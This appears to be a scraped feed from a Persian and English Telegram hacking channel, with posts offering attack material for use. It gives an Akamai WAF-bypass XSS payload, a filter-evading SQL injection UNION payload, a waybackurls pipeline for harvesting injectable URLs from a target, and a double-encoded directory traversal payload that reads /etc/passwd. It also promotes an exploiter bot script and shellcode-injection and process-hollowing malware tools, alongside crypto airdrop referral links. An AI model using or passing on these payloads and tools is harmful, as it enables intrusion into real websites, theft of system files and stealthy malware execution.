payload to bypass Akamai WAF
#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?foobar=<foo%20bar=%250a%20onclick=<your js code>
#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Sql injection Manual Bypass WAF
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
#sql_injection #sql #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
Zero Exploiter 🔥 Bot Exploit 💎
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
0Day.Today | Learn Exploit | Zero World | Dark web |
Zero Exploiter 🔥 Bot Exploit 💎 Share and subscribe Made with ❤️ #Priv8 #Exploit —————— 0Day.Today @LearnExploit @A3L3_KA4
ZeroExploiter.py
4 KB
Zero Exploiter 🔥 Bot Exploit 💎
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
Share and subscribe
Made with ❤️
#Priv8 #Exploit
——————
0Day.Today
@LearnExploit
@A3L3_KA4
0Day.Today | Learn Exploit | Zero World | Dark web |
ZeroExploiter.py
دوستان همون طور که قبلا گفتم
این اکسپلویتر روی یه متد داره چک میکنه
و اینکه قبل از استفاده لایبراری هاشو نصب کنید
و روش قفلم نذاشتم ❤️
این اکسپلویتر روی یه متد داره چک میکنه
و اینکه قبل از استفاده لایبراری هاشو نصب کنید
و روش قفلم نذاشتم ❤️
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
پاول دورف گفته که تا اخر ماه میلادی جاری، قابلیتی اضافه میشه که وقتی روی هشتگی در کانال کلیک میکنید، تلگرام لیست تمام پستهایی که کانالهای پابلیک از اون هشتگ استفاده کردن رو نشون میده، چیزی مشابه هشتگ در اینستاگرام.
#news
——————
@Learnexploit
#news
——————
@Learnexploit
Forwarded from LearnExploit ️ (R00T)
کد ساخت پروفایل دلخواه برای ایفون های سری 14 و 15 هم داره تموم میشه 😄 نظرتونه ؟
0Day.Today | Learn Exploit | Zero World | Dark web |
کد ساخت پروفایل دلخواه برای ایفون های سری 14 و 15 هم داره تموم میشه 😄 نظرتونه ؟
اسکریپت انتن نسخه رایگان با توضیحات کامل در گیتهاب منتشر شد
https://github.com/IR0DayToday/Anten
استار یادتون نره 😄😉
https://github.com/IR0DayToday/Anten
استار یادتون نره 😄😉
GitHub
GitHub - IR0DayToday/Anten: برنامه نوشته شده با پایتون که به شما این اجازه رو میده که پروفایل های گوشی های ایفون سری 14 و 15 رو…
برنامه نوشته شده با پایتون که به شما این اجازه رو میده که پروفایل های گوشی های ایفون سری 14 و 15 رو به صورت اختصاصی کاستوم کنید. - IR0DayToday/Anten
RWX_MEMEORY_HUNT_AND_INJECTION_DV
💬
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling CreateRemoteThread, NtCreateRemoteThread or Direct calls.
💻 Usage:
Just compile the program and run the (EXE) without any paremeter.
💡 Steps:
⚪️ Find the OneDrive.exe in running processes.
⚪️ Get the handle of OneDrive.exe.
⚪️ Query remote process memory information.
⚪️ look for RWX memory regions.
⚪️ Write shellcode into found region of OneDrive.exe
⚪️ Fork OneDrive.exe into a new process.
⚪️ Set the forked process's start address to the cloned shellcode.
⚪️ Terminate the cloned process after execution
▶ DEMO
😸 Github
⬇️ Download
🔒
#ShellCode #Malware
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
📣 T.me/A3l3_KA4
Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. This technique is finding RWX region in already running processes in this case OneDrive.exe and Write shellcode into that region and execute it without calling CreateRemoteThread, NtCreateRemoteThread or Direct calls.
Just compile the program and run the (EXE) without any paremeter.
A3l3_KA4
#ShellCode #Malware
Please open Telegram to view this post
VIEW IN TELEGRAM
Ghostly Hollowing Via Tampered Syscalls
Implementing the ghostly hollowing PE injection technique using tampered syscalls.
😸 Github
⬇️ Download
🔒
#syscall #Injection
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Implementing the ghostly hollowing PE injection technique using tampered syscalls.
LearnExploit
#syscall #Injection
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Root Exploit
ایردراپ جدید Seed با تفاوت اینکه کلیکی نیست بر مبنای زمانه ، فقط هر چند ساعت بیاید داخلش claim کنید 💎
@seed_coin_bot
@seed_coin_bot
یس کوین به طور رسما اعلام کرد که این توکن روی بلاکچین TON عرضه میشه
اگه هنوز استارت نزدی از لینک زیر جوین بده :
https://t.me/theYescoin_bot/Yescoin?startapp=KAfe7V
اگه هنوز استارت نزدی از لینک زیر جوین بده :
https://t.me/theYescoin_bot/Yescoin?startapp=KAfe7V
ایردراپ تایم فارم ( time farm )
هر چقدر که پوینت جمع میکنین داخل بات در آخر به این توکنی که تو عکسه بشه 💵
تا الان 45 میلیون دلار جذب سرمایه هم داشته 💎
لینک جوین شدن ایردراپ
هر چقدر که پوینت جمع میکنین داخل بات در آخر به این توکنی که تو عکسه بشه 💵
تا الان 45 میلیون دلار جذب سرمایه هم داشته 💎
لینک جوین شدن ایردراپ